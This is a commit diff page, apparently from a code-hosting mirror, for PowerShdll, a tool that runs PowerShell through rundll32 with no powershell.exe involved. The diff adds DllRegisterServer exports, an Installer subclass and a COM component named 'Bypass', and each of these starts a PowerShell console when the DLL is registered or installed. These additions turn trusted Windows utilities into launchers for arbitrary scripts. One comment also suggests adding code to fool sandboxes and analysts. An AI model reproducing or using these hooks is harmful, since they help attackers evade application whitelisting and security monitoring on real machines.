crash.software
Projects
Pull Requests
Issues
Builds
PowerShdll
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY PowerShdll Commits eeaed2fe
🤬
  • ■ ■ ■ ■ ■ ■
    dll/Common.cs
    skipped 90 lines
    91 91   }
    92 92   
    93 93   class PowerShdll{
     94 + [DllImport("kernel32.dll")]
     95 + static extern IntPtr GetConsoleWindow();
     96 + 
    94 97   Process pp;
    95 98   PS ps;
    96 99   public PowerShdll() {
    skipped 5 lines
    102 105   }
    103 106   public void interact()
    104 107   {
    105  - Console.WriteLine("PowerShdll.dll v0.1");
     108 + Console.WriteLine("PowerShdll.dll");
    106 109   string cmd = "";
    107 110   while (cmd.ToLower() != "exit")
    108 111   {
    skipped 40 lines
    149 152   Console.SetCursorPosition(0, Console.CursorTop + 2);
    150 153   Console.WriteLine("Usage:");
    151 154   Console.WriteLine("rundll32 PowerShdll,main <script>");
     155 + Console.WriteLine("rundll32 PowerShdll,main -h\t Display this message");
    152 156   Console.WriteLine("rundll32 PowerShdll,main -f <path>\t Run the script passed as argument");
    153  - Console.WriteLine("rundll32 PowerShdll,main -w\t Start an interactive console in a new window");
     157 + Console.WriteLine("rundll32 PowerShdll,main -w\t Start an interactive console in a new window (Default)");
    154 158   Console.WriteLine("rundll32 PowerShdll,main -i\t Start an interactive console in this console");
    155 159   Console.WriteLine("\nIf you do not have an interractive console, use -n to avoid crashes on output");
    156 160   
    skipped 2 lines
    159 163   int i=0;
    160 164   bool useConsole = true;
    161 165   string ret;
    162  - if (args[i]=="") { usage(); return; }
     166 + if (args.Length == 0)
     167 + {
     168 + PSConsole.getNewConsole();
     169 + this.interact();
     170 + }
    163 171   if (args[i] == "-n")
    164 172   {
    165 173   i++;
    skipped 1 lines
    167 175   }
    168 176   if (args[i] == "-h")
    169 177   {
    170  - usage();
     178 + usage();return;
    171 179   }
    172  - else if (args[i] == "-w")
     180 + else if (args[i] == "-w" || args[i]=="")
    173 181   {
    174 182   PSConsole.getNewConsole();
    175 183   this.interact();
    skipped 4 lines
    180 188   pp.Suspend();
    181 189   PSConsole.stealConsole(pp);
    182 190   Console.Title = "PowerShdll";
    183  - Console.CancelKeyPress += delegate {
     191 + Console.CancelKeyPress += delegate
     192 + {
    184 193   this.cleanup();
    185 194   };
    186 195   Console.SetCursorPosition(0, Console.CursorTop + 1);
    skipped 17 lines
    204 213   if (script != "error")
    205 214   {
    206 215   ret = ps.exe(script);
    207  - if (useConsole) {
     216 + if (useConsole)
     217 + {
    208 218   pp = Process.GetCurrentProcess().Parent();
    209 219   PSConsole.stealConsole(pp);
    210  - Console.CancelKeyPress += delegate {
     220 + Console.CancelKeyPress += delegate
     221 + {
    211 222   this.cleanup();
    212 223   };
    213 224   Console.SetCursorPosition(0, Console.CursorTop + 1);
    214 225   Console.WriteLine(ret);
    215 226   }
    216  - }
     227 + }
    217 228   }
    218 229   else
    219  - {
    220  - string script = string.Join(" ",args, i, args.Length-i);
    221  - if (script[0] == '"' && script[script.Length - 1] == '"') {
     230 + {
     231 + string script = string.Join(" ", args, i, args.Length - i);
     232 + if (script[0] == '"' && script[script.Length - 1] == '"')
     233 + {
    222 234   script = script.Substring(1, script.Length - 2);
    223 235   }
    224 236   ret = ps.exe(script);
    skipped 1 lines
    226 238   {
    227 239   pp = Process.GetCurrentProcess().Parent();
    228 240   PSConsole.stealConsole(pp);
    229  - Console.CancelKeyPress += delegate {
     241 + Console.CancelKeyPress += delegate
     242 + {
    230 243   this.cleanup();
    231 244   };
    232 245   Console.SetCursorPosition(0, Console.CursorTop + 1);
    skipped 118 lines
  • ■ ■ ■ ■ ■ ■
    dll/PowerShdll.csproj
    skipped 22 lines
    23 23   <DefineConstants>DEBUG;TRACE</DefineConstants>
    24 24   <ErrorReport>prompt</ErrorReport>
    25 25   <WarningLevel>4</WarningLevel>
     26 + <Prefer32Bit>false</Prefer32Bit>
    26 27   </PropertyGroup>
    27 28   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
    28 29   <PlatformTarget>AnyCPU</PlatformTarget>
    skipped 3 lines
    32 33   <DefineConstants>TRACE</DefineConstants>
    33 34   <ErrorReport>prompt</ErrorReport>
    34 35   <WarningLevel>4</WarningLevel>
     36 + <Prefer32Bit>false</Prefer32Bit>
    35 37   </PropertyGroup>
    36 38   <PropertyGroup>
    37 39   <StartupObject />
    skipped 6 lines
    44 46   <PlatformTarget>x64</PlatformTarget>
    45 47   <ErrorReport>prompt</ErrorReport>
    46 48   <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
     49 + <Prefer32Bit>false</Prefer32Bit>
    47 50   </PropertyGroup>
    48 51   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x64'">
    49 52   <OutputPath>bin\x64\Release\</OutputPath>
    skipped 3 lines
    53 56   <PlatformTarget>x64</PlatformTarget>
    54 57   <ErrorReport>prompt</ErrorReport>
    55 58   <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
     59 + <Prefer32Bit>false</Prefer32Bit>
    56 60   </PropertyGroup>
    57 61   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x86'">
    58 62   <DebugSymbols>true</DebugSymbols>
    skipped 3 lines
    62 66   <PlatformTarget>x86</PlatformTarget>
    63 67   <ErrorReport>prompt</ErrorReport>
    64 68   <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
     69 + <Prefer32Bit>false</Prefer32Bit>
    65 70   </PropertyGroup>
    66 71   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x86'">
    67 72   <OutputPath>bin\x86\Release\</OutputPath>
    skipped 3 lines
    71 76   <PlatformTarget>x86</PlatformTarget>
    72 77   <ErrorReport>prompt</ErrorReport>
    73 78   <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
     79 + <Prefer32Bit>false</Prefer32Bit>
     80 + </PropertyGroup>
     81 + <PropertyGroup>
     82 + <SignAssembly>true</SignAssembly>
     83 + </PropertyGroup>
     84 + <PropertyGroup>
     85 + <AssemblyOriginatorKeyFile>BullShit.pfx</AssemblyOriginatorKeyFile>
    74 86   </PropertyGroup>
    75 87   <ItemGroup>
    76 88   <Reference Include="RGiesecke.DllExport.Metadata, Version=1.0.0.0, Culture=neutral, PublicKeyToken=8f52d83c1a22df51, processorArchitecture=MSIL">
    skipped 7 lines
    84 96   <Reference Include="Microsoft.CSharp" />
    85 97   <Reference Include="System.Data" />
    86 98   <Reference Include="System.Net.Http" />
     99 + <Reference Include="System.Configuration.Install" />
    87 100   <Reference Include="System.Xml" />
     101 + <Reference Include="System.EnterpriseServices" />
    88 102   <Reference Include="System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
    89 103   <SpecificVersion>False</SpecificVersion>
    90 104   <HintPath>..\..\..\..\..\..\..\Program Files\Reference Assemblies\Microsoft\WindowsPowerShell\v1.0\System.Management.Automation.dll</HintPath>
    skipped 6 lines
    97 111   </ItemGroup>
    98 112   <ItemGroup>
    99 113   <None Include="App.config" />
     114 + <None Include="BullShit.pfx" />
    100 115   <None Include="packages.config" />
    101 116   </ItemGroup>
    102 117   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
    skipped 9 lines
  • ■ ■ ■ ■ ■ ■
    dll/Program.cs
    1 1  using System;
    2 2  using System.Runtime.InteropServices;
    3 3  using RGiesecke.DllExport;
     4 +using System.Configuration.Install;
     5 +using System.Diagnostics;
     6 +using System.Reflection;
     7 +using System.EnterpriseServices;
    4 8   
    5 9  //https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/
    6 10   
     11 +[assembly: ApplicationActivation(ActivationOption.Server)]
     12 +[assembly: ApplicationAccessControl(false)]
     13 + 
    7 14  namespace Powershdll
    8 15  {
    9  - public static class UtilDLL
     16 + public class Program
    10 17   {
    11  - public static void useless() {
     18 + public static void Main()
     19 + {
     20 + Console.WriteLine("Hello From Main...I Don't Do Anything");
     21 + //Add any behaviour here to throw off sandbox execution/analysts :)
    12 22   }
     23 + 
     24 + }
     25 + public static class UtilDLL
     26 + {
    13 27   [DllExport("main", CallingConvention = CallingConvention.Cdecl)]
    14 28   public static void main(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
    15 29   {
    16 30   PowerShdll psdl = new PowerShdll();
    17 31   psdl.start(lpszCmdLine.Split(' '));
    18 32   }
     33 + 
     34 + [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
     35 + public static void DllRegisterServer()
     36 + {
     37 + PowerShdll psdl = new PowerShdll();
     38 + psdl.start(new string[0]);
     39 + }
     40 + [DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
     41 + public static void DllUnregisterServer()
     42 + {
     43 + PowerShdll psdl = new PowerShdll();
     44 + psdl.start(new string[0]);
     45 + }
    19 46   }
     47 + 
     48 + [System.ComponentModel.RunInstaller(true)]
     49 + public class Thing1 : System.Configuration.Install.Installer
     50 + {
     51 + //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
     52 + public override void Uninstall(System.Collections.IDictionary savedState)
     53 + {
     54 + }
     55 + 
     56 + }
     57 + 
     58 + [ComVisible(true)]
     59 + [Guid("31D2B969-7608-426E-9D8E-A09FC9A51680")]
     60 + [ClassInterface(ClassInterfaceType.None)]
     61 + [ProgId("dllguest.Bypass")]
     62 + [Transaction(TransactionOption.Required)]
     63 + public class Bypass : ServicedComponent
     64 + {
     65 + public Bypass() { }
     66 + 
     67 + [ComRegisterFunction] //This executes if registration is successful
     68 + public static void RegisterClass(string key)
     69 + {
     70 + PowerShdll psdl = new PowerShdll();
     71 + psdl.start(new string[0]);
     72 + }
     73 + 
     74 + [ComUnregisterFunction] //This executes if registration fails
     75 + public static void UnRegisterClass(string key)
     76 + {
     77 + PowerShdll psdl = new PowerShdll();
     78 + psdl.start(new string[0]);
     79 + }
     80 + 
     81 + public void Exec() {
     82 + PowerShdll psdl = new PowerShdll();
     83 + psdl.start(new string[0]);
     84 + }
     85 + }
     86 + 
    20 87  
    21 88  }
    22 89   
    skipped 2 lines
  • dll/bin/Release/PowerShdll.dll
    Binary file.
  • ■ ■ ■ ■ ■ ■
    dll/bin/Release/PowerShdll.dll.config
     1 +<?xml version="1.0" encoding="utf-8"?>
     2 +<configuration>
     3 + <startup>
     4 +
     5 + <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1"/></startup>
     6 +</configuration>
     7 + 
  • dll/bin/x64/Release/PowerShdll.dll
    Binary file.
  • ■ ■ ■ ■ ■ ■
    dll/bin/x64/Release/PowerShdll.dll.config
    1  -<?xml version="1.0" encoding="utf-8" ?>
     1 +<?xml version="1.0" encoding="utf-8"?>
    2 2  <configuration>
    3 3   <startup>
    4  - <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />
    5  - </startup>
     4 +
     5 + <supportedRuntime version="v2.0.50727"/></startup>
    6 6  </configuration>
     7 + 
  • dll/bin/x86/Release/PowerShdll.dll
    Binary file.
  • ■ ■ ■ ■ ■ ■
    exe/Common.cs
    skipped 18 lines
    19 19   }
    20 20   public void interact()
    21 21   {
    22  - Console.WriteLine("PowerShdll.dll v0.1");
     22 + Console.WriteLine("PowerShdll.dll");
    23 23   string cmd = "";
    24 24   while (cmd.ToLower() != "exit")
    25 25   {
    skipped 29 lines
    55 55   {
    56 56   Console.WriteLine("Usage:");
    57 57   Console.WriteLine("PowerShdll.exe <script>");
     58 + Console.WriteLine("PowerShdll.exe -h\t Display this messages");
    58 59   Console.WriteLine("PowerShdll.exe -f <path>\t Run the script passed as argument");
    59  - Console.WriteLine("PowerShdll.exe -i\t Start an interactive console");
     60 + Console.WriteLine("PowerShdll.exe -i\t Start an interactive console (Default)");
    60 61   }
    61 62   public void start(string[] args)
    62 63   {
    63  - if (args.Length==0) { usage(); return; }
     64 + if (args.Length==0) { this.interact(); return; }
    64 65   else if (args[0] == "-h")
    65 66   {
    66 67   usage();
    skipped 74 lines
  • ■ ■ ■ ■ ■ ■
    exe/PowerShdllExe.csproj
    skipped 22 lines
    23 23   <DefineConstants>DEBUG;TRACE</DefineConstants>
    24 24   <ErrorReport>prompt</ErrorReport>
    25 25   <WarningLevel>4</WarningLevel>
     26 + <Prefer32Bit>false</Prefer32Bit>
    26 27   </PropertyGroup>
    27 28   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
    28 29   <PlatformTarget>AnyCPU</PlatformTarget>
    skipped 3 lines
    32 33   <DefineConstants>TRACE</DefineConstants>
    33 34   <ErrorReport>prompt</ErrorReport>
    34 35   <WarningLevel>4</WarningLevel>
     36 + <Prefer32Bit>false</Prefer32Bit>
    35 37   </PropertyGroup>
    36 38   <PropertyGroup>
    37 39   <StartupObject />
    skipped 32 lines
  • exe/bin/Release/Powershdll.exe
    Binary file.
Please wait...
Page is in error, reload to recover